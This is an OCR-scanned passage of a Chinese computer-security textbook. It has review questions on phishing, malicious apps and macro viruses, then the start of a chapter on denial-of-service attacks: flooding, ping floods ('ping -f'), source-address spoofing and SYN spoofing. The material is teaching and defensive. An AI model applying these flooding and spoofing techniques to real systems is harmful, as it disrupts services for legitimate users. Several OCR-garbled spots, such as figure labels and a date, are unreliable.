观看 这 些 视频 。 如 果 你 允许 其 安装 ， 这 可 能 会 对 你 的 计算 机 系统 造成 什么 威胁 ? 

你 买 了 一 部 新 的 智能 手机 ， 对 可 以 使 用 大 量 的 app 感到 兴奋 。 你 了 解 到 一 款 好玩 的 游戏 ， 然 后 在 
网 页 中 搜索 它 ， 在 一 个 免费 的 应 用 市 场 中 找到 了 一 个 可 用 的 版 本 。 当 你 准备 下 载 和 安装 app 时 ， 
你 被 要 求 赋予 其 一 定 的 权限 。 你 发 现 该 app 需求 “发 送 短 信 ” 和 “获取 你 的 地 址 德 ”权限 。 你 会 
不 会 对 游戏 需要 这 类 权限 感到 惊讶 ? 这 个 app 可 能 会 对 你 的 手机 造成 什么 威胁 ， 你 是 否 会 同意 其 
要 求 的 权限 然后 安装 app ? 这 可 能 是 什么 类 型 的 恶意 软件 ? 

假如 你 接 到 了 一 封 电子 邮件 ， 看 上 去 像 是 你 的 上 司 发 来 的 ， 主 题 是 过 问 你 最 近 正在 做 的 项 目 。 当 
你 查看 电子 邮件 时 ， 邮 件 要 求 你 浏览 附件 ， 附 件 是 一 个 压缩 包 ， 里面 有 一 个 PDF 文档 ， 你 在 解压 
前 检查 一 切 细节 无 误 。 当 你 试图 打开 PDF 时 ， 阅 读 器 弹出 了 一 个 题 为 “ 载 人 文件 ”的 对 话 框 ， 表 
明 “ 设 置 文件 和 阅读 器 应 用 程序 来 加 载 PDF 文档 ”。 对 话 框 中 有 名 为 “文件 ”的 选项 ， 中 间 有 许 
多 空 行 ， 最 后 有 名 为 “打开 ”和 “关闭 ”两 个 按钮 ， 用 来 查看 这 个 文档 。 你 也 注意 到 有 一 个 垂直 
的 拖 动 条 。 如 果 你 点 击 这 个 “打开 ”按钮 ， 你 的 计算 机 系统 可 能 会 受到 什么 样 的 威胁 ? 在 查看 可 
疑 内 容 时 ， 怎 么 样 才 能 不 对 你 的 系统 产生 威胁 ? 这 种 类 型 的 信息 会 让 你 联想 到 什么 类 型 的 攻击 ? 
有 多 少 人 可 能 接 到 过 类 似 的 电子 邮件 ? 

假设 你 接 到 了 一 封 电子 邮件 ， 看 上 去 像 来 自 你 光顾 过 的 银行 ， 里面 有 银行 的 Logo， 内 容 如 下 : 
“亲爱 的 顾客 ， 我 们 的 记录 显示 你 的 网 银 由 于 多 次 试图 利用 错误 的 账号 、 口 令 和 安全 验证 码 进行 登 
录 , 已 被 冻结 。 我 们 极力 建议 你 立刻 恢复 账户 权限 ， 避 免 被 永久 冻结 ， 请 点 此 链接 恢复 你 的 账户 ， 
感谢 你 。 

这 封 电子 邮件 试图 进行 何 种 攻击 ? 用 来 分 发 此 类 邮件 最 可 能 的 机 制 是 什么 ?如 何 应 对 此 类 邮件 ? 
假设 你 从 一 个 金融 公司 收 到 一 封 信 ， 信 中 说 你 拖欠 贷款 ， 要 求 及 时 偿还 。 但 是 ， 你 知道 你 从 来 没 
申请 过 或 收 到 过 该 公司 的 贷款 ! 究竟 发 生 了 什么 才 让 这 样 一 笔 贷款 “ 冒 了 出 来 ”? 是 什么 样 的 恶 
意 软件 ， 通 过 哪些 计算 机 系统 ， 给 予 了 攻击 者 足够 的 信息 来 成 功 申请 这 笔 贷款 ? 

列 出 个 人 电脑 会 遭受 的 攻击 类 型 ， 和 个 人 (基于 主机 ) 防火 墙 和 反 病 毒 软件 应 帮 你 对 抗 哪些 类 型 的 
攻击 。 何 种 措施 可 以 帮助 阻止 宏 病 毒 通过 电子 邮件 附件 传播 ? 如 何 防止 系统 中 的 后 门 被 利用 ? 
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拒绝 服务 攻击 





学 习 目标 
学 习 完 本 章 之 后 ， 你 应 该 能 够 ; 
o 解释 拒绝 服务 攻击 的 基本 概念 ; 
理解 洪 泛 攻 击 的 本 质 ; 
描述 分 布 式 拒绝 服务 攻击 ; 


解释 基于 应 用 程序 的 带宽 攻击 的 概念 ， 并 举 出 一 些 实例 ; 
概述 反射 攻击 和 放大 攻击 ; 

总 结 一 些 常用 的 拒绝 服务 攻击 对 抗 方法 ; 

总 结 常用 的 对 拒绝 服务 攻击 的 应 对 方法 。 





在 第 1 章 中 ， 我 们 列 出 了 一 些 基 本 的 安全 服务 ， 其 中 之 一 就 是 可 用 性 安全 服务 。 可 用 性 安 
全 服务 关系 到 授权 用 户 在 有 服务 请 求 时 是 否 可 以 访问 或 者 使 用 一 个 系统 。 拒 绝 服务 攻击 (DoS 
攻击 ) 试图 通过 完全 地 阻碍 或 阻塞 服务 器 所 提供 的 一 些 正常 服务 来 破坏 服务 的 可 用 性 。 攻 击 尝 
试 耗 尽 一 些 与 服务 相关 的 重要 系统 资源 。 例 如 ， 一 个 对 Web 服务 器 发 起 的 洪 泛 攻击 ， 攻 击 者 
发 起 相当 多 的 虚假 请 求 ， 使 得 服务 器 几乎 不 可 能 及 时 地 响应 来 自用 户 的 正常 请 求 。 在 本 章 中 ， 
我 们 将 探讨 拒绝 服务 攻击 ， 包 括 它 的 定义 、 攻 击 所 采取 的 形式 和 相关 的 防范 措施 。 


7.1 拒绝 服务 攻击 


2010 4E 12 A, 4% Visa 和 MasterCard 在 内 的 一 些 网 站 ， 由 于 与 备 受 争议 的 Web 站 点 
WikiLeaks 切断 联系 而 导致 短 时 间 宕 机 ， 该 事件 成 为 全 球 性 的 新 闻 。 事 实 上 ， 由 各 式 各 样 因 素 
引发 的 类 似 的 攻击 每 天 都 会 发 生成 百 上 于 次 。 如 此 频繁 的 攻击 ， 在 某 种 程度 上 归 因 于 中 断 Web 
站 点 的 服务 非常 容易 。 

黑客 开展 分 布 式 拒 绝 服务 攻击 (Distributed Denial-of-Service, DDoS) 已 经 十 余年 ， 随 着 
时 间 的 推移 ， 其 攻击 能 力也 在 不 断 提高 。 由 于 互联 网 带宽 的 增长 ， 攻 击 的 最 大 规模 从 2002 
年 的 流量 400MB/ 秒 增长 到 2010 年 的 100GB/ 秒 [ARBO10]， 再 到 2013 年 Spamhaus 攻击 的 
300GB/ 秒 。 流 量 达 到 50GB/ 秒 的 大 部 分 洪 泛 攻击 已 经 几乎 能 够 耗 尽 攻 击 目标 的 所 有 带宽 资源 
了 ， 而 且 这 些 目标 可 能 包括 互联 网 核心 交换 节点 和 主 DNS 域名 服务 器 。 即 使 是 小 规模 的 攻击 
也 可 能 造成 意 想不到 的 后 果 。 曾 有 媒体 报道 过 这 样 一 则 新 闻 : 某 犯罪 组 织 利 用 DDoS 攻击 银行 
系统 ， 以 掩盖 其 攻击 银行 支付 设备 和 ATM 网 络 的 企图 。 


7.1.1 拒绝 服务 攻击 简介 


拒绝 服务 ( Denial-of-Service，DoS) 攻击 是 一 种 针对 某 些 服务 可 用 性 的 攻击 。 从 计算 机 和 
通信 安全 的 角度 来 说 ，DoS 攻击 一 般 攻 击 目标 系统 的 网 络 服务 ， 通 过 攻击 其 网 络 连接 来 实现 。 
这 种 针对 服务 可 用 性 的 攻击 不 同 于 其 他 传统 意义 上 的 不 可 抗力 产生 的 攻击 ， 它 是 通过 造成 IT 
基础 设施 的 损害 或 毁坏 而 导致 服务 能 力 的 丧失 。 

NIST 计算 机 安全 事故 处 理 指南 (NIST Computer Security Incident Handling Guide)[CICH12] 
中 对 DoS 攻击 给 出 的 定义 如 下 : 
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拒绝 服务 ( DoS) 是 一 种 通过 耗 尽 CPU、 内 存 、 带 宽 以 及 磁盘 空间 等 系统 资源 ， 来 阻止 或 前 





弱 对 网 络 、 系 统 或 应 用 程序 的 授权 使 用 的 行为 。 


由 上 述 定义 可 知 ， 可 作为 Dos 攻击 对 象 的 资源 有 下 面 几 类 : 

e 网 络 带 宽 

e 系统 资源 

e 应 用 资源 

网 络 带宽 与 连接 服务 器 和 Internet 的 网 络 链 路 的 容量 相关 。 对 于 大 部 分 组 织 来 说 ， 网 络 带 
宽 指 的 是 连接 到 其 网 络 服 务 提供 商 ( internet service provider, ISP) 的 链 路 容量 ， 如 图 7-1 给 出 
的 网 络 实例 所 示 。 通 常 这 个 连接 的 容量 低 于 ISP 路 由 器 内 部 以 及 ISP 路 由 器 之 间 的 链 路 容量 。 
这 就 意味 着 可 能 会 发 生 这 样 的 情况 : 经 过 具有 更 高 容量 的 链 路 的 到 达 ISP 路 由 器 的 通信 量 要 高 
于 到 组 织 的 链 路 的 通信 量 。 在 这 种 情况 下 ，ISP 路 由 器 只 能 发 送 链 路 所 能 承载 的 最 大 流量 ， 对 于 
超出 的 流量 必须 丢弃 。 在 正常 网 络 运行 环境 下 ， 由 于 正常 用 户 的 超 负荷 访问 ， 同 样 会 使 得 服务 
器 网 络 繁忙 。 那 么 这 些 正 常用 户 当 中 就 会 随机 地 有 一 部 分 不 能 够 得 到 服务 器 的 响应 。 对 于 一 个 
已 经 超 负荷 的 TCP/P 网 络 连接 来 说 ， 服 务 器 不 可 用 也 是 在 预料 之 中 的 。 但 在 DoS 攻击 的 情况 
下 ， 攻 击 者 直接 或 间接 地 制造 出 大 量 的 恶意 流量 发 往 目标 服务 器 。 这 种 攻击 流量 相 比 任何 的 合 
法 流量 来 说 是 压倒 性 的 ， 其 有 效 地 拒绝 了 合法 用 户 对 服务 器 的 访问 。 最 近 某 些 大 强度 的 攻击 直 
接 针 对 为 目标 组 织 提供 支持 的 ISP 网 络 ， 目 的 在 于 破坏 其 与 其 他 网 络 的 连接 。 文 献 [AROR11] 中 
列 出 了 很 多 最 近 出 现 的 DDoS 攻击 ， 其 中 还 包括 有 关 这 些 攻 击 的 强度 和 危害 性 的 相关 评论 。 

针对 系统 资源 的 DoS 攻击 ， 一 般 是 通过 过 度 加 载 或 者 使 系统 网 络 处理 程 序 崩 省 来 实现 攻 
击 。 相 比 于 通过 消耗 网 络 带宽 的 DoS 攻击 来 说 ， 这 种 攻击 更 胜 一 筹 ， 其 利用 特殊 类 型 的 数据 
包 耗 尽 服务 器 上 有 限 的 可 用 系统 资源 ， 从 而 达到 攻击 目的 。 这 些 系统 资源 包括 接收 数据 包 的 临 
时 缓冲 区 、 打 开 连 接 表 和 类 似 的 内 存 数据 结构 。 接 下 来 我 们 要 讲 到 的 SYN 欺骗 攻击 ， 就 是 这 
种 类 型 的 攻击 ， 其 攻击 目标 是 服务 器 上 的 TCP 连接 表 。 


Web 服 务 器 





图 7-1 说 明 DoS 攻击 的 网 络 实例 
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另 一 种 形式 的 针对 系统 资源 的 DoS 攻击 ， 通 过 使 用 某 些 特殊 数据 包 来 触发 系统 的 网 络 处 
理 软 件 的 缺陷 ， 导 致 系统 崩 演 。 如 果 受 到 这 种 Dos 攻击 ， 除 非 管理 员 重 新 启动 网 络 处 理 程 序 
(这 一 般 通 过 重新 启动 目标 系统 实现 )， 否 则 服务 器 将 无 法 再 通过 网 络 处 理 程序 来 提供 网 络 服务 。 
例如 ， 有 毒 数据 包 (poison packet) 就 是 这 种 可 以 使 得 网 络 处 理 软件 出 错 的 特殊 数据 包 。 经 典 
的 死亡 之 ping (ping of death) AA x (teardrop) 也 是 这 种 类 型 的 攻击 ， 它 们 主要 是 针对 早 
期 的 Windows 9x 操作 系统 。 这 两 种 攻击 分 别针 对 Windows 网 络 代码 中 处 理 ICMP 回 送 请 求 数 
据 包 和 数据 包 分 片 的 程序 中 存在 的 缺陷 。 

针对 特定 应 用 服务 程序 如 Web 服务 器 的 攻击 一 般 使 用 一 定数 量 的 合法 请 求 ， 而 每 个 合 
法 请 求 都 会 明显 地 消耗 掉 服务 器 上 的 系统 资源 ， 那 么 就 可 以 达到 限制 服务 器 响应 其 他 合法 用 
户 请 求 的 目的 。 例 如 ， 某 Web 服务 器 可 能 会 提供 数据 库 查 询 服务 。 如 果 能 够 构造 出 一 个 巨 
大 的 、 高 代价 的 查询 请 求 ， 攻 击 者 就 能 够 向 服务 器 提出 大 量 的 这 类 查询 请 求 。 这 样 就 会 限制 
Web 服务 器 响应 其 他 合法 用 户 的 查询 请 求 。 所 谓 的 cyberslam 攻击 就 是 这 种 类 型 的 DoS 攻击 。 
[KAND05] 中 讨论 了 这 种 攻击 并 给 出 了 一 些 可 行 的 应 对 策略 。 另 一 种 攻击 方法 是 通过 构造 出 一 
个 能 触发 服务 器 程序 出 错 的 查询 请 求 ， 最 终 导致 服务 器 程序 崩溃 。 这 就 是 说 ， 除 非 重 新 启动 ， 
否则 服务 器 将 不 再 能 够 响应 用 户 的 请 求 。 

DoS 攻击 同样 可 以 按照 攻击 主机 ( 即 产 生 流向 目标 系统 的 流量 的 主机 ) 的 数量 来 区 分 。 最 
初 ， 攻 击 者 仅 控制 使 用 一 台 或 少数 几 台 源 系 统 。 任 何 攻击 ， 都 要 针对 服务 器 的 网 络 处 理 代 码 或 
某 个 应 用 的 缺陷 向 服务 器 发 送 数据 包 。 通 常 ， 需 要 采用 分 布 式 或 者 放大 的 DoS 攻击 使 多 个 系 
统 同 时 产生 很 高 的 通信 流量 。 稍 后 我 们 会 讨论 这 些 攻 击 。 


7.1.2 经典 的 拒绝 服务 攻击 


对 于 一 个 组 织 ， 最 简单 经 典 的 DoS 攻击 就 是 洪 泛 攻击 (flooding attack)。 洪 泛 攻击 的 目标 
就 是 占据 所 有 到 目标 组 织 的 网 络 连接 的 容量 。 如 果 攻 击 者 能 够 访问 具有 大 容量 网 络 连接 的 系 
统 ， 那 么 这 个 系统 可 能 会 产生 比 目 标 连接 容量 大 得 多 的 通信 流量 。 在 图 7-1 所 示 的 网 络 中 ， 攻 
击 者 可 以 利用 大 型 公司 的 Web 服务 器 来 攻击 那些 有 较 小 容量 网 络 连接 的 中 型 公司 的 Web 服务 
器 。 攻 击 者 可 以 简单 地 发 送 大 量 ping 9 数据 包 给 目标 公司 的 Web 服务 器 ， 这 些 流量 可 以 被 它 
们 之 间 的 路 径 上 的 高 容量 链 路 所 处 理 ， 直 到 到 达 Internet 云图 中 的 最 终 路 由 器 。 在 这 里 ， 一 些 
数据 包 被 丢弃 ， 剩 余 的 数据 包 将 会 消耗 掉 到 中 型 公司 的 链 路 的 大 部 分 容量 。 这 导致 该 链 路 出 现 
拥塞 ， 致 使 其 他 有 效 流 量 基 本 上 被 丢弃 。 

在 经 典 的 ping 洪 泛 攻击 中 ，ICMP 回 送 请 求 数 据 包 的 源 地 址 使 用 的 是 攻击 者 的 真实 IP 
地 址 ， 攻 击 的 源 很 容易 被 识别 。 那 么 从 攻击 者 的 角度 看 就 会 存在 两 个 问题 : 第 一 ， 由 于 攻击 
源 很 容易 被 清楚 地 识别 ， 那 么 被 发 现 和 受到 法 律 追究 的 可 能 性 大 大 增加 。 第 二 ， 目 标 系统 会 
尽 可 能 地 响应 请 求 。 每 当 服 务 器 接收 到 一 个 ICMP 回 送 请 求 数据 包 ， 就 会 发 送 一 个 ICMP E 
送 响应 数据 包 给 攻击 者 ， 这 会 将 攻击 反射 给 攻击 源 。 尽 管 攻击 者 拥有 较 高 的 网 络 带 宽 而 不 
至 于 被 这 些 返 送 回来 的 ICMP 回 送 响应 数据 包 “ 反 ping 死 "， 但 其 网 络 性 能 也 会 被 显著 地 影 
响 ， 并 且 加 大 了 被 发 现 并 采取 应 对 措施 的 可 能 。 出 于 这 些 原 因 ， 攻 击 者 一 般 都 会 隐藏 其 真实 
的 身份 。 这 意味 着 任何 一 个 攻击 数据 包 都 将 使 用 一 个 不 存在 的 或 者 虚假 地 址 作为 数据 包 的 源 
地 址 。 


O “ping” 命 令 是 一 个 常用 的 网 络 诊断 程序 ， 用 于 测试 到 特定 主机 的 连接 情况 。 该 命令 向 目标 主机 发 送 TCP/IP 
ICMP 回 送 请 求 数据 包 并 测量 回 送 响 应 数据 包 返 回 的 时 间 。 通 常 这 些 包 以 一 个 可 控 的 速率 发 送 ， 然 而 ， 洪 泛 
选项 指定 这 些 包 的 发 送 应 该 尽 可 能 地 快 ， 这 通常 用 命令 “ping -f” 设 定 。 
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7.1.3 ” 源 地 址 欺骗 


在 很 多 类 型 的 Dog 攻击 中 ， 所 使 用 数据 包 的 一 个 共同 特征 是 采用 伪造 的 源 地 址 ， 也 就 是 
所 谓 的 源 地 址 欺骗 (source address spoofing)。 只 要 拥有 访问 某 计 算 机 系统 上 网 络 处 理 程序 的 
充分 权限 ， 攻 击 者 就 能 够 很 容易 地 制造 出 具有 伪造 源 地 址 的 数据 包 (实际 上 ， 其 他 属性 正常 ) 。 
这 往往 是 通过 许多 操作 系统 上 的 原始 套 接 字 接 口 (raw socket interface) 来 实现 的 。 操 作 系统 设 
计 者 是 为 了 进行 某 些 自 定 义 的 网 络 测试 或 网 络 协议 的 研究 而 引入 原始 套 接 字 接口 的 ， 并 不 是 用 
于 正常 的 网 络 操作 。 然 而 ， 由 于 历史 兼容 性 和 继承 性 ， 在 当今 一 些 操作 系统 当中 仍然 保留 着 原 
始 套 接 字 接 口 。 攻 击 者 利用 这 些 可 用 的 标准 接口 就 可 以 相当 轻松 地 制造 出 具有 伪造 属性 的 数据 
包 。 如 果 没 有 这 些 接口 ， 攻 击 者 要 想 制 造 出 具有 伪造 源 地 址 的 数据 包 ， 就 不 得 不 安装 一 些 自 定 
义 的 设备 驱动 程序 来 获得 硬件 级 的 设备 访问 权限 。 这 将 给 攻击 者 造成 很 大 的 麻烦 ， 并 且 还 依赖 
于 攻击 者 所 使 用 的 操作 系统 的 版 本 。 

由 于 拥有 了 对 网 络 接口 的 硬件 级 访问 权限 ， 攻 击 者 可 以 制造 出 大 量 的 目的 地 址 指向 目标 
系统 的 数据 包 ， 但 这 些 数据 包 的 源 地 址 是 随机 选择 的 ， 通常 各 不 相同 。 拿 上 一 节 我 们 所 讲 到 
的 ping 洪 泛 攻击 来 举例 ， 自 定义 的 ICMP 回 送 请 求 数据 包 从 源 系 统 经 由 同一 路 径 发 向 目标 系 
统 ， 同 样 的 拥塞 将 发 生 在 连接 到 最 终 的 低 容量 链 路 的 路 由 器 上 。 然 而 ， 作 为 这 些 数据 包 到 达 
目标 系统 的 响应 的 ICMP 回 送 响应 数据 包 将 不 能 再 反 送 给 源 系 统 ， 而 是 散发 到 Internet 上 各 种 
伪造 的 源 地 址 。 其 中 一 些 地 址 可 能 对 应 于 真实 系统 。 因 为 这 些 系统 并 不 期 望 收 到 响应 数据 包 ， 
所 以 它们 可 能 会 以 差错 报告 数据 包 响 应 。 这 只 能 是 增 大 目标 系统 的 网 络 负 荷 。 还 有 一 些 地 址 
未 被 使 用 或 不 可 到 达 。 对 于 这 些 ICMP 回 送 响应 数据 包 ， 可 能 会 返回 ICMP 目的 不 可 达 数 据 
包 ， 或 者 将 数据 包 简 单 抛弃 8。 任 何 返 送 回来 的 数据 包 只 会 加 大 目标 系统 的 网 络 拥塞 。 

使 用 带 有 伪造 源 地 址 的 数据 包 也 会 使 得 发 现 攻击 者 很 困难 。 攻 击 数 据 包 看 上 去 是 由 分 散 
在 Internet 上 的 主机 产生 的 ， 因 而 简单 地 分 析 数 据 包 的 头 部 属性 是 不 足以 检测 出 攻击 者 的 。 然 
而 在 数据 包 从 攻击 源 到 目标 系统 之 间 的 路 由 器 上 ， 我 们 必须 识别 出 这 些 异 常数 据 包 。 这 就 需要 
管理 这 些 路 由 器 的 网 络 工 程 师 们 之 间 相 互 合 作 ， 这 相 比 于 简单 地 读 取 数 据 包 的 源 地 址 要 复杂 得 
多 。 检 测 异 常数 据 包 不 是 接收 者 单方 面 的 工作 ， 而 是 需要 整个 网 络 的 网 络 工程 师 来 协作 检测 经 
过 他 们 所 管理 路 由 器 的 流量 信息 。 这 是 一 个 既 耗 时 又 耗 力 的 人 工 工作 。 

为 什么 Internet 中 允许 如 此 容易 地 伪造 源 地 址 是 值得 我 们 深思 的 。 追 溯 到 TCP/IP 发 展 的 
早期 ， 网络 之 间 的 通信 和 都 是 在 可 信任 的 、 相 互 合作 的 网 络 之 间 进 行 的 ， 因 而 TCP/IP 根本 就 没 
有 必要 验证 数据 包 的 源 地 址 是 否 与 数据 包 生 成 者 相 一 致 ， 这 种 一 致 性 设 为 默认 的 。 其 实 我 们 可 
以 在 路 由 器 上 安装 过 滤器 来 确认 数据 包 源 地 址 的 真实 性 〈 至 少 确 认 该 源 地 址 是 合法 的 )。 然 而 ， 
过 滤 @ 应 该 尽 可 能 地 在 接近 源 系统 的 路 由 器 上 进行 ， 因 为 越 接近 源 系 统 的 路 由 器 ， 它 上 面 的 关 
于 合法 源 地 址 的 信息 就 越 准 确 。 大 体 上 ， 过 滤器 应 该 安装 在 组 织 连接 到 Internet 的 路 由 器 上 ， 
即 ISP 提供 该 连接 的 边界 上 。 对 于 DoS 类 的 攻击 ， 尽 管 这 是 长 期 以 来 推荐 的 安全 建议 ， 例 如 
(RFC 2827 )， 但 一 直 未 被 ISP 采纳 ， 因 此 使 得 利用 具有 伪造 源 地 址 的 数据 包 的 DoS 攻击 常常 
发 生 。 

这 种 为 了 响应 具有 伪造 源 地 址 的 数据 包 而 产生 的 呈 发 散 状 发 送 到 网 络 上 的 响应 数据 包 有 
一 个 有 用 的 “副作用 ”。 安 全 研究 人 员 ， 如 从 事 Honeynet 项 目的 研究 人 员 ， 会 屏蔽 掉 未 被 使 用 
的 全 x 地 址 ， 提 供 建议 路 由 ， 然 后 收集 发 送 到 这 些 地 址 的 数据 包 。 由 于 并 没有 真实 的 主机 使 用 
这 些 地 址 ， 那 么 发 送 到 这 个 地 址 的 数据 包 一 定 是 异常 的 数据 包 。 任 何 一 个 接收 的 数据 包 都 可 能 


日 ”为 响应 其 他 ICMP 包 而 产生 的 ICMP 包 通 常 首先 被 丢弃 。 
日 ”这 就 是 通常 所 说 的 “出 口 过 滤 ”。 
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是 恶意 的 ， 因 为 它 很 可 能 是 来 自 直接 或 间接 的 网 络 攻击 。 举 个 例子 来 说 ， 在 ping 洪 泛 攻击 中 ， 
目标 系统 为 了 响应 ICMP 回 送 请 求 数据 包 所 产生 的 ICMP 回 送 响应 数据 包 就 属于 这 种 数据 包 。 
这 也 就 是 所 谓 的 发 散 反馈 流量 (backscatter traffic)。 例 如 ， 正 如 在 [MOOR06] 中 所 描述 的 ， 监 
视 数 据 包 类 型 可 以 为 我 们 在 判定 攻击 类 型 和 攻击 规模 时 提供 有 用 信息 。 这 些 信息 正在 用 于 开发 
对 已 有 攻击 的 应 对 策略 。 


7.1.4 SYN 欺骗 


除了 基本 的 洪 泛 攻击 ， 另 一 种 常见 的 经 典 DoS 攻击 是 SYN 欺骗 攻击 。SYN 欺骗 攻击 通 
过 造成 服务 器 上 用 于 管理 TCP 连接 的 连接 ele ane 
表 溢 出 ， 从 而 攻击 网 络 服务 器 响应 TCP 连 p 
接 请 求 的 能 力 。 这 意味 着 以 后 的 合法 用 户 的 4 
TCP 连接 请 求 将 得 不 到 服务 器 响应 ， 拒 绝 其 SES al 
访问 服务 器 。SYN 欺骗 攻击 是 针对 系统 资 Mi 
源 的 DoS 攻击 ， 具 体 地 说 就 是 针对 操作 系 Caz) 

统 上 网 络 处 理 程序 的 攻击 。 i T 人 

为 了 便于 理解 这 种 攻击 的 原理 ， 我 们 a 
先 回顾 一 下 TCE 用 来 建立 连接 的 三 次 所 之 一 ee ee 
手 。 如 图 7-2 所 示 ， 客 户 端 初始 化 一 个 带 有 ,接收 SYN-ACK 
SYN 标志 的 数据 包 并 发 送 给 服务 器 ， 以 发 
起 TCP 连接 请 求 。 这 个 SYN 数据 包 中 包括 (ak) 用 O& f sax 
了 客户 端的 地 址 、 端 口 和 初始 序号 ， 当 然 也 at) 
可 以 包含 对 其 他 TCP 选项 的 请 求 。 服 务 器 
在 TCP 连接 表 中 记录 下 这 个 连接 请 求 的 详 
细 信息 ， 接 着 用 SYN-ACK 数据 包 来 响应 客 
户 端的 请 求 。SYN-ACK 数据 包 中 包括 服务 器 的 序号 ， 并 将 客户 端的 序号 加 1， 以 确认 SYN 数 
据 包 已 经 收 到 。 一 旦 客户 端 接收 到 服务 器 的 SYN-ACK 数据 包 ， 客 户 端 就 会 发 送 一 个 ACK 数 
据 包 给 服务 器 ， 其 中 的 服务 器 序号 加 1， 并 将 TCP 连接 标记 为 已 连接 。 同 样 地 ， 当 服务 器 接 
收 到 这 个 来 自 客户 端的 ACK 数据 包 时 ， 也 会 将 TCP 连接 标记 为 已 连接 。 此 后 ， 双 方 就 可 以 利 
用 这 个 TCP 连接 来 传输 数据 了 。 然 而 在 现实 情况 下 ， 这 种 理想 的 交互 操作 常常 会 失败 。TCP 
三 次 握手 中 所 使 用 的 数据 包 都 是 通过 P 协议 传输 的 ,而 他 协议 是 一 种 不 可 靠 的 、 尽 力 而 为 
(best-effort) 的 网 络 协 议 。 在 此 协议 中 ， 任 何 数据 包 在 传输 过 程 中 都 有 可 能 丢失 ， 如 由 于 网 络 
拥塞 而 丢失 。 因 此 ， 无 论 客 户 端 还 是 服务 器 都 需要 跟踪 其 发 送 的 数据 包 。 如 果 在 规定 的 时 间 内 
没有 得 到 响应 ， 就 需要 重 发 这 些 数据 包 。 因 而 基于 重 发 机 制 的 TCP 协议 是 一 个 可 靠 的 传输 协 
议 。 任 何 使 用 TCP 协议 进行 数据 传输 的 应 用 程序 都 不 需要 考虑 数据 包 丢失 或 者 重新 排序 问题 。 
当然 ， 这 也 增加 了 系统 在 管理 数据 包 可 靠 传输 上 的 开销 。 

SYN 炊 骗 攻击 正 是 利用 了 目标 服务 器 系统 上 的 这 种 行为 而 发 动 攻击 。 攻 击 者 构造 出 一 定 
数量 的 具有 伪造 源 地 址 的 SYN 连接 请 求 数据 包 并 发 送 给 目标 系统 。 对 其 中 的 每 个 数据 包 ， 服 
务 器 都 要 记录 该 TCP 连接 请 求 的 详细 信息 ， 并 发 送 SYN-ACK 响应 包 到 请 求 数据 包 中 声称 的 
源 地 址 ， 如 图 7-3 所 示 。 如 果 的 确 存在 一 个 与 源 地 址 匹配 的 主机 ， 那 么 源 地 址 所 对 应 的 主机 将 
会 发 送 一 个 RST (reset， 复 位 ) 包 给 服务 器 ， 让 服务 器 取消 这 个 莫名 其 妙 的 连接 请 求 。 服 务 器 
接收 到 RST 包 后 会 取消 这 个 连接 请 求 并 删除 TCP 连接 表 中 的 相关 信息 。 但 是 ， 如 果 源 地 址 所 
对 应 的 主机 繁忙 或 者 根本 就 没有 主机 使 用 这 个 源 地 址 ， 那 么 将 不 会 有 RST 数据 包 发 送 给 服务 


(seq=y, ack=x+1 ) 


图 7-2 TCP 三 次 连接 握手 
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器 。 这 时 ， 服 务 器 就 会 不 停 地 重新 发 送 SYN-ACK 包 到 源 地 址 ， 直 到 最 终 认定 连接 请 求 已 经 失 
败 并 删除 连接 请 求 表 中 的 相关 信息 。 从 SYN 连接 请 求 数据 包 到 服务 器 认定 连接 请 求 失败 的 这 
段 时 间 内 ， 服 务 器 使 用 TCP 连接 表 中 的 一 个 表 项 来 存储 相关 的 信息 。 而 连接 表 的 大 小 ( 表 项 
的 个 数 ) 是 在 假设 大 多 数 的 连接 请 求 能 够 在 短 时 间 内 完成 并 且 能 够 同时 处 理 合理 数量 的 请 求 的 
情况 下 设 定 的 。 然 而 ， 在 SYN 欺骗 攻击 中 ， 攻 击 者 发 送 大 量 的 欺骗 性 的 连接 请 求 给 目标 服务 
器 ,这 些 欺 骗 性 连接 请 求 的 信息 将 会 迅速 地 填 满 服务 器 上 的 TCP 连接 表 。 而 一 旦 连接 表 被 填 
满 ， 那 么 后 来 的 TCP 连接 请 求 ， 包 括 来 自 正常 用 户 的 请 求 ， 都 不 会 得 到 服务 器 的 响应 。 在 正 
常 网 络 运行 情况 下 ， 在 连接 超时 后 ， 已 超时 的 TCP 连接 请 求 的 相关 信息 会 被 清理 出 TCP 连接 
表 。 但 是 攻击 者 不 会 给 服务 器 任何 喘息 的 机 会 ， 如 果 他 不 停 地 发 送 足 量 的 欺骗 性 TCP 连接 请 
求 给 服务 器 ， 那 么 TCP 连接 表 就 会 永远 被 填 满 ， 导 致 服务 器 与 Internet 的 连接 被 切断 ， 无 法 响 
应 大 多 数 合法 的 连接 请 求 。 


攻击 者 服务 器 被 散 骗 的 客户 端 


发 送 具有 被 
欺骗 的 源 地 
址 的 SYN 包 





发 送 SYN_ACK © 
(seq=y, ack=x+1 ) RS 
a 
超时 之 后 重 发 ey 的 SYN-ACK 
SYN-ACK 包 ™—._. 包 被 丢弃 
假定 连接 Pred. 


请 求 失败 


图 7-3 TCP SYN 欺骗 攻击 


为 了 尽 可 能 多 地 占用 服务 器 上 的 TCP 连接 表 ， 攻 击 者 一 般 都 希望 使 用 那些 不 会 用 RST 响 
应 SYN-ACK 的 源 地 址 。 这 可 以 通过 令 那些 具有 被 选 作 为 伪造 源 地 址 的 主机 超载 或 者 仅仅 使 用 
大 范围 随机 地 址 做 到 。 对 于 后 者 ， 攻 击 者 依据 这 样 的 事实 ，Internet 上 有 很 多 未 被 使 用 的 地 址 。 
因此 ， 随 机 产生 的 源 地 址 有 相当 一 部 分 不 会 有 与 其 对 应 的 真实 主机 。 

在 网 络 流量 方面 ，SYN 欺骗 攻击 和 基本 的 洪 泛 攻击 有 明显 的 差别 。SYN 攻击 所 形成 的 
网 络 流量 相对 来 说 比较 小 ， 更 不 会 接近 与 服务 器 相连 的 链 路 的 最 大 容量 。 只 要 能 够 使 得 TCP 
连接 表 被 填 满 就 可 以 。 这 就 意味 着 攻击 者 不 必 像 洪 泛 攻击 那样 访问 大 容量 的 网 络 连接 。 在 如 
图 7-1 所 描述 的 网 络 中 ， 中 型 的 组 织 甚至 宽带 家 庭 用 户 都 可 以 利用 SYN 欺骗 攻击 成 功 地 攻击 
大 型 公司 的 服务 器 。 

利用 单一 主机 进行 的 洪 泛 攻击 和 SYN 欺骗 攻击 可 能 是 DoS 攻击 最 常见 的 两 种 早期 形式 。 
洪 泛 攻击 具有 明显 的 限制 ， 需 要 使 用 许多 主机 才能 增加 其 有 效 性 。 接 下 来 我 们 将 要 分 析 洪 泛 攻 
